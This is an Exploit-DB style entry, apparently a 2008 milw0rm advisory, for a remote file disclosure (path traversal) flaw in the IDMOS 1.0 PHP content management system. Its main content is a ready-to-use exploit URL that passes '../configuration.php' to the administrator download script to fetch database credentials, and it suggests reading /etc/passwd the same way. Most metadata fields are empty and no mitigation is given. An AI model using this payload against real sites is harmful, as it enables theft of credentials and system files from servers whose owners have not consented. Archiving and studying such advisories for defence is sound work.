idmos1.0 Remote File Discolousure Vulnerability

vendor:

IDMOS

by:

MhZ91

N/A

CVSS

N/A

Remote File Discolousure

N/A

CWE

Product Name: IDMOS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

idmos1.0 Remote File Discolousure Vulnerability

We can download file present on the server... for example we can get the file of db credentials, configuration.php. Exploit: http://[www.example.com]/administrator/download.php?fileName=../configuration.php or try to get /etc/passwd :)

Mitigation:

N/A

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		        idmos1.0 Remote File Discolousure Vulnerability              +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: Remote File Discolusure Vulnerability
 Download: http://sourceforge.net/project/showfiles.php?group_id=188355 idmos1.0
 Bug: Remote File Discolousure Vulnerability
 Info: IDMOS is a CMS (Content Management System) that fill all requirements in IDM Method. It provides dynamic front-end and administrative tools. Multilanguage, template-based, component-base, it is written in PHP and uses MySQL as DB.
 Visit: http://www.inj3ct-it.org


[*]----------------------------------------------------------


We can download file present on the server... for example we can get the file of db credentials, configuration.php

Exploit:

http://[www.example.com]/administrator/download.php?fileName=../configuration.php


or try to get /etc/passwd :) 


[*]----------------------------------------------------------

# milw0rm.com [2008-01-21]